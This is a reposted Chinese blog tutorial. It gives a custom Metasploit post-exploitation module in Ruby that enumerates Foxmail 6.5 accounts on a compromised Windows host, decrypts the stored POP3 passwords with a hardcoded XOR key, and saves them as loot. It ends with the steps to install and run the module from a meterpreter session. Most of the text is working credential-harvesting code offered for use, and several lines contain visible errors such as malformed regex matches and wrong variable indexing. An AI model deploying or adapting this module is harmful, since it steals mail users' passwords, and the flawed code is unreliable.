1. 程式人生 > >滲透之——Metasploit自定義收集登入憑證的後滲透模組

滲透之——Metasploit自定義收集登入憑證的後滲透模組

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86415478

這裡,我們以攻擊Foxmail 6.5為例,將嘗試對登入憑證進行解密,然後將它儲存到資料庫。

注意:執行這個指令碼的前提是我們已經經過一系列的滲透拿下了目標Windows系統的System許可權。

這裡,我們編寫指令碼foxmail_decrypt_by_binghe.rb,內容如下:

##
# Author 冰河
# Date 2019-01-13
# Description 對foxmail 6.5的登入憑證進行解密
#
# 實現過程如下:
# 1.搜尋使用者的檔案,查詢當前使用者的LocalAppData資料夾的準確位置
# 2.使用上面找到的文職,並將其與\VirtualStore\Program Files(x86)\Tencent\Foxmail\mail連線,建立一個mail資料夾的完整路徑
# 3.列出mail資料夾下的所有資料夾,並將它們都儲存到一個數組中。在mail資料夾中的每一個資料夾的名字都對應著一個郵箱使用者名稱,比如
[email protected]
就可以是mail資料夾下的一個資料夾 # 4.在mail資料夾下的accounts檔案中查詢Account.stg檔案 # 5.通過讀取Account.stg檔案,會發現名為POP3Password的雜湊 # 6.將這個值傳遞給解密方法,然後就會得到明文密碼 # 7.將這些值儲存到資料庫 ## require 'msf/core' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles def initialize(info={}) super(update_info(info, 'Name' => 'Foxmail 6.5 Credential Harvester', 'Description' => %q{ This module Finds and Decrypts Stored Foxmail 6.5 Credentials }, 'License' => MSF_LICENSE, 'Author' => ['binghe'], 'Platform' => ['Windows'], 'SessionTypes' => ['Meterpreter'] )) end #程式入口 def run profile = grap_user_profiles() counter = 0 data_entry = "" profile.each do |user| if user['LocalAppData'] full_path = user['LocalAppData'] full_path = full_path + "\\VirtualStore\\Program Files(x86)\\Tencent\\Foxmail\\mail" if directory?(full_path) print_good("Fox Mail Installed, Enumerating Mail Accounts") session.fs.dir.foreach(full_path) do |dir_list| if dir_list = ~/@/ counter = counter + 1 full_path_mail = full_path + "" + dir_list + "" + "Account.stg" if file?(full_path_mail) print_good("Reading Mail Account #{counter}") file_content = read_file(full_path_mail).split("\n") file_content.each do |hash| if hash = ~/POP3Password/ hash_data = hash.split("=") hash_value = hash[1] if hash_value.nil? print_error("No Saved Password") else print_good("Decrypting Password for mail account: #{dir_list}") #呼叫解密方法進行解密 decrypted_pass = decrypt(hash_value, dir_list) data_entry << "Username:" + dir_list + "\t" + "Password:" + decrypted_pass + "\n" end end end end end end end end end store_loot("Foxmail Accounts", "text/plain", session, data_entry, "Fox.txt", "Fox Mail Accounts") end #解密方法 def decrypt(hash_real, dir_list) decoded = "" magic = Array[126,100,114,97,71,111,110,126] fc0 = 90 size = (hash_real.length) / 2 - 1 index = 0 b = Array.new(size) for i in 0 .. size do b[i] = (hash_real[index, 2]).hex index = index + 2 end b[0] = b[0] ^ fc0 double_magic = magic + magic d = Array.new(b.length - 1) for i in 1 .. b.length - 1 do d[i-1] = b[i] ^ double_magic[i - 1] end e = Array.new(d.length) for i in 0 .. (d.length -1) if(d[i] - b[i] < 0) e[i] = d[i] + 255 - b[i] else e[i] = d[i] - b[i] end decoded << e[i].chr end print_good("Found Username #{dir_list} with Password: #{decoded}") return decoded end end

然後我們將foxmail_decrypt_by_binghe.rb指令碼上傳到Kali的/usr/share/metasploit-framework/modules/post/windows/gather/credentials目錄下。

在執行這個指令碼之前,我們先使用Metasploit中的msftidy工具檢查一下此指令碼的語法是否正確。

在Kali的命令列執行如下命令:

/usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metasploit-framework/modules/post/windows/gather/credentials/foxmail_decrypt_by_binghe.rb

未輸出任何資訊,證明指令碼正確。

接下來,我們的Kali命令列,執行如下命令:

meterpreter > background
msf > set SESSION 1
msf > use post/windows/gather/credentials/foxmail_decrypt_by_binghe 
msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > show options

Module options (post/windows/gather/credentials/foxmail_decrypt_by_binghe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf post(windows/gather/credentials/foxmail_decrypt_by_binghe) > run